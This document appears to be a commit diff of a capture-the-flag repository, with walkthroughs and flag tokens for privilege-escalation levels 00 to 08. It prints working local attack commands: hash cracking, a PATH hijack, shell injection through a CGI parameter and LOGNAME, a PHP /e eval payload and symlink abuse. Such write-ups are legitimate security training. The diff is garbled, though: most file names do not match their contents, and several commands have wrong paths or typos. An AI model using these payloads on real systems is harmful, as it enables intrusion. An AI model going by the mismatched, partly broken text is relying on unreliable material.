doc done, get all flag

Author: Archibald THIRION

level00/flag

@@ -0,0 +1 @@
+x24ti5gi3x0ol2eh4esiuxias

level00/resources/How.md

@@ -0,0 +1,30 @@
+# **Level00**
+
+### **Walk through**
+
+ A good first step for this level would be a simple `ls -la`. Of course things aren't as simple as that.
+
+As the aim of the whole project and thus of this level too is to be able to `su flag<level>`, we want to search for a file on which the user **flag00** would have some rights. To do so we can try the following command:
+
+`find / -user flag00 -group flag00 2>/dev/null | grep -v proc`
+
+This command gives us that output:
+
+`/usr/sbin/john`  
+`/rofs/usr/sbin/john`
+
+`ls -la /usr/sbin/john` shows us this:
+
+`----r--r-- 1 flag00 flag00 15 Mar  5  2016 /usr/sbin/john`
+
+We have the permission to read the file, if we `cat /usr/sbin/john` we get:
+
+**`cdiiddwpgswtgt`**
+
+Unfortunately, if we give that as the password of `su flag00` we don't get anywhere. We can easily jump to the conclusion that **`cdiiddwpgswtgt`** is the encrypted password we're looking for. Let's decode it using [**dcode**](https://www.dcode.fr/cipher-identifier). This website offers many decoder tools as well as a cypher identifier. For this one we gonna try to decode it as a Caesar cypher. This tool gives us that solution, who seems pretty good **`nottoohardhere`**. Indeed it is, as we able to log as `su flag00` with it. The last step, according to the subject is to `getflag`. This command gives us our first flag: 
+
+**`x24ti5gi3x0ol2eh4esiuxias`** 
+
+We will use it to log as level01
+
+`su level01`

level01/flag

@@ -0,0 +1 @@
+f2av5il02puano7naaf6adaaf

level01/resources/How.md

@@ -0,0 +1,37 @@
+
+
+# **Level01**
+
+### **Walk through**
+
+As we'll do for almost all levels, let's try `ls -la`. Like the last level, it gives us nothing, and it will be the same for the `find` command, the following option `-name flag01` and `-user flag01 -group flag01` won't get us anywhere.
+
+A good option would be to give a look at the file **/etc/passwd**. This file stores very useful users accounts information. This [**documentation**](https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/) gives us some explanations to understand it and use it to our advantage. Let's see what this file contains.
+
+`cat /etc/passwd` gives us this:
+
+`...`  
+`level13:x:2013:2013::/home/user/level13:/bin/bash`  
+`level14:x:2014:2014::/home/user/level14:/bin/bash`  
+`flag00:x:3000:3000::/home/flag/flag00:/bin/bash`  
+**`flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash`**  
+`flag02:x:3002:3002::/home/flag/flag02:/bin/bash`  
+`flag03:x:3003:3003::/home/flag/flag03:/bin/bash`  
+`...`
+
+Reading the documentation given right above, we see that the **`x`** after the username means that the password of the user is hashed and stored into the file `/etc/shadow`. If we pay attention we'll see that it's not the case for the user we're looking for, we directly got the hash **`42hDRfypTqqnw`** .  The issue we're facing now is that a hash is not made to be decoded. Luckily the tool [**John the Ripper**](https://medium.com/@JAlblas/tryhackme-john-the-ripper-walkthrough-75331d14748c) is there to help us.
+
+Following the tutorial we gonna use it the following way:
+
+`echo 42hDRfypTqqnw > encrypt_flag01.txt`  
+`john encrypt_flag01.txt --show`
+
+John will quickly output the flag01's password: **`abcdefg`**.
+
+All we have to do now is to log as `su flag 01` with that password. `getflag` gives us:
+
+**`f2av5il02puano7naaf6adaaf`**
+
+We will use it to log as level02
+
+`su level02`

level02/flag

@@ -0,0 +1 @@
+kooda2puivaav1idi4f57q8iq

level02/level02.pcap

@@ -0,0 +1,35 @@
+
+
+# **Level02**
+
+### **Walk through**
+
+This time a simple `ls -la` gives us a result. We find a file **level02.pcap**.
+
+Great, let's find out what's a .pcap file and how to analyze it.
+
+A PCAP (Packet Capture) file is a binary data file that stores network traffic captured during packet sniffing or network monitoring. It contains the raw data of packets, including headers and payloads, allowing for analysis and troubleshooting of network issues. 
+
+What we want to do now is to analyze that file and to look for our flag02 through those packets. To do so we gonna use the tool [**Wireshark**](https://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html) which is a network protocol analyzer. 
+
+We can see that the protocol of our network traffic is TCP. 
+
+![wireshark](https://github.com/Cristinamois/snowcrash/blob/main/level02/resources/wireshark.png)
+
+Knowing that, we will follow the TCP stream.
+
+`Analyze > Follow > TCP stream`
+
+![tcp_stream](https://github.com/Cristinamois/snowcrash/blob/main/level02/resources/tcp_stream.png)
+
+We can see that the password seems to be **`ft_wandr...NDRel.L0L`** . Looking closer, we see that we can display the stream in ascii but also in hexadecimal. By analyzing the hex version, we see that the `.` corresponds to the ascii code `7f`. That code is actually the code of `DEL`.
+Then, the password should be **`ft_waNDReL0L`**.
+
+Using it we can `su flag02`. `getflag` gives us:
+
+**`kooda2puivaav1idi4f57q8iq`**
+
+We will use it to log as level03
+
+`su level03`
+

level02/resources/How.md

@@ -0,0 +1 @@
+qi0maab88jeaj46qoumi7maus

level02/resources/tcp_stream.png

@@ -0,0 +1,32 @@
+
+
+# **Level03**
+
+### **Walk through**
+
+For this level, we see that we have a binary in our home. We try to run it:
+
+`./level03` and it gives us `Exploit me`
+
+A good start could be to `strings level03`. This command output a lot of lines. Among them , we can read:
+
+**`/usr/bin/env echo Exploit me`**
+
+So we can suppose that the binary probably call `echo` a some point.
+
+The idea here is to create a program (or a script) called `echo`. Its purpose would be to execute `getflag`. To do so we will execute the following commands:
+
+`echo "/bin/sh -c 'getflag'" > /tmp/echo`  
+`chmod +x /tmp/echo`  
+
+Now we have to modify the path to be sure that level03 runs our echo.
+
+`export PATH=/tmp:$PATH`
+
+By adding the directory `/tmp/` at the beginning of path, our echo will be executed "first". The exploit works.
+
+`./level03`  gives us **`qi0maab88jeaj46qoumi7maus`**
+
+We will use it to log as level04
+
+`su level04`

level02/resources/wireshark.png

@@ -0,0 +1 @@
+ne2searoevaevoem4ov4ar8ap

level03/flag

@@ -0,0 +1,28 @@
+
+
+# **Level04**
+
+### **Walk through**
+
+For this level, we have a file level04.pl in our home. It's a Perl script. 
+
+`cat level04.pl` gives us:
+
+```perl
+#!/usr/bin/perl
+# localhost:4747
+use CGI qw{param};
+print "Content-type: text/html\n\n";
+sub x {
+  $y = $_[0];
+  print `echo $y 2>&1`;
+}
+x(param("x")); 
+```
+**sub x** define a subroutine. In it, there's a variable **y** that takes the value of the first argument of the function. The back ticks mean for **print** that it has to execute the shell command `echo $y 2>&1` instead of print `echo $y 2>&1`. So we can conclude that **y** aka the first param will be executed. So the idea in this case is to pass `getflag` as argument to the **x** subroutine. To do so, we'll use that command:
+
+`curl 'localhost:4747?x=$(getflag)'`  gives us **`ne2searoevaevoem4ov4ar8ap`**
+
+We will use it to log as level05
+
+`su level05`

level03/resources/How.md

@@ -0,0 +1 @@
+viuaaale9huek52boumoomioc

level04/flag

@@ -0,0 +1,41 @@
+
+
+# **Level05**
+
+### **Walk through**
+
+This time, `ls -la` gives us nothing. We try: 
+
+`find / -user flag05 -group flag05 2>/dev/null | grep -v proc` that gives us:
+
+```
+/usr/sbin/openarenaserver
+/rofs/usr/sbin/openarenaserver
+```
+
+When we `cat /usr/sbin/openarenaserver`  we obtain this output:
+
+```bash
+#!/bin/sh
+
+for i in /opt/openarenaserver/* ; do
+        (ulimit -t 5; bash -x "$i")
+        rm -f "$i"
+done
+```
+It's a script bash. This script loop over everything in the directory. `ulimit -t 5` gives a limit of 5 seconds of CPU time. `bash -x "$i"` execute **$i** and the **-x** print the command in the standard error output. After the execution of a file, it's deleted. 
+
+So the idea is to write a script that will be store in `/opt/openarenaserver/` and executed by the script just above.
+
+To do so, 
+
+`echo "getflag > /tmp/flag05" > /opt/openarenaserver/script.sh`  
+`chmod +x /opt/openarenaserver.sh`  
+
+Now all we have to do is:
+
+`cat /tmp/flag05` until the flag appears **`viuaaale9huek52boumoomioc`**
+
+We will use it to log as level06
+
+`su level06`

level04/resources/How.md

@@ -0,0 +1 @@
+wiok45aaoguiboiki2tuin6ub

level05/flag

@@ -0,0 +1,73 @@
+
+
+
+# **Level06**
+
+### **Walk through**
+
+For this 6th level we got two files, a .php script and a binary, respectively level06.php and level06.
+
+`cat level06.php`
+
+```php
+#!/usr/bin/php
+<?php
+
+// Define a function 'y' that replaces '.' with ' x ' and '@' with ' y' 
+// in a given string.
+
+function y($m) {
+    $m = preg_replace("/\./", " x ", $m);
+    $m = preg_replace("/@/", " y", $m);
+    return $m;
+}
+
+// Define a function 'x' that takes two parameters, reads the contents of a file
+// specified by the first parameter, and performs some regular expression
+// replacements on the content.
+
+function x($y, $z) {
+
+    // Read the contents of the file specified by $y into a variable $a.
+    $a = file_get_contents($y);
+
+    // Replace occurrences of '[x (anything)]' with the result of calling function
+	// 'y' on the captured content.
+    $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
+
+    // Replace '[' with '(' and ']' with ')' in the content.
+    $a = preg_replace("/\[/", "(", $a);
+    $a = preg_replace("/\]/", ")", $a);
+
+    // Return the modified content.
+    return $a;
+}
+
+// Call function 'x' with command-line arguments and print the result.
+$r = x($argv[1], $argv[2]);
+print $r;
+?>
+
+```
+
+We should take a special attention at this precise line:
+
+**`$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);`**
+
+Indeed, the `/e` is a well know vulnerabilities in php script. The e modifier in PHP regular expressions stands for "eval." When used, it allows the evaluation of the matched pattern as PHP code. We will use it at our advantage. We'll write a script that we'll pass as argument at ./level06.
+
+```
+echo '[x ${`getflag`}]' > /tmp/flag06
+./level06 /tmp/flag06
+
+PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
+ in /home/user/level06/level06.php(4) : regexp code on line 1
+
+```
+
+The flag is **wiok45aaoguiboiki2tuin6ub**
+
+We will use it to log as level07
+
+`su level07`
+

level05/resources/How.md

@@ -0,0 +1 @@
+fiumuikeil55xe9cu4dood66h

level06/flag

@@ -0,0 +1,55 @@
+
+
+# **Level07**
+
+### **Walk through**
+
+In this level, we have a binary level07
+
+`./level07` gives us `level07`
+
+Not so much clues at this point. Using [**ghidra**](https://www.csoonline.com/article/567221/how-to-get-started-using-ghidra-the-free-reverse-engineering-tool.html), we can disassemble the binary in C code. 
+
+```C
+int main(int argc,char **argv,char **envp) {
+  char *pcVar1;
+  int iVar2;
+  char *buffer;
+  gid_t gid;
+  uid_t uid;
+  char *local_1c;
+  __gid_t local_18;
+  __uid_t local_14;
+  
+  local_18 = getegid();
+  local_14 = geteuid();
+  setresgid(local_18,local_18,local_18);
+  setresuid(local_14,local_14,local_14);
+  local_1c = (char *)0x0;
+  pcVar1 = getenv("LOGNAME");
+  asprintf(&local_1c,"/bin/echo %s ",pcVar1);
+  iVar2 = system(local_1c);
+  return iVar2;
+}
+```
+
+Those two lines are particularly interesting:
+
+`pcVar1 = getenv("LOGNAME");`  
+`asprintf(&local_1c,"/bin/echo %s ",pcVar1);`  
+
+We see that the env var **LOGNAME** is echoed. Indeed when we look at the env, we observe that: `LOGNAME=level07` which makes sense with the current output of `./level07`.
+
+The idea is to change the value of **LOGNAME** to be `getflag`. The issue is that `/bin/echo getflag` just echo `getflag`. The trick is to set `getflag` between back ticks since when echo is follow by an expression between back ticks it executes and prints the result of the expression. Let's change the value of our env var.
+
+```
+export LOGNAME='\`getflag\`'
+```
+
+Now, `./level07` gives us:
+
+**`fiumuikeil55xe9cu4dood66h`**
+
+We will use it to log as level08
+
+`su level08`

level06/resources/How.md

@@ -0,0 +1 @@
+25749xKZ8L7DkSCwJkT9dyv6f

level07/flag

@@ -0,0 +1,25 @@
+
+
+# **Level08**
+
+### **Walk through**
+
+This time, we have a binary `level08` and a file `token`
+
+`./level08` gives us `./level08 [file to read]`
+
+`./level08 token` gives us `You may not access 'token'`
+
+`ls -la token` shows us that the permission of that file are `-rw-------`,
+
+We don't have rights on **token**, so the idea is to find a way to use it even if we don't have any access. To do so, we could symlink **token** in `/tmp/token`. Indeed the permission of a symlink are typically always lrwxrwxrwx (read, write, execute for owner, group, and others), regardless of the permissions of the target file. The permissions of the target file are what determine access. If the target file has 600 permissions (read and write for the owner only), the symlink allows anyone with read access to follow the link.
+
+`ln -s /home/user/level08/token /tmp/flag08`
+
+`./level08 /tmp/token` gives us the flag `quif5eloekouj29ke0vouxean`
+
+Using that flag with `su flag08` and doing getflag gives us `25749xKZ8L7DkSCwJkT9dyv6f`
+
+We will use it to log as level09
+
+`su level09`

level07/resources/How.md

@@ -0,0 +1 @@
+s5cAJpM8ev6XHw998pRWG728z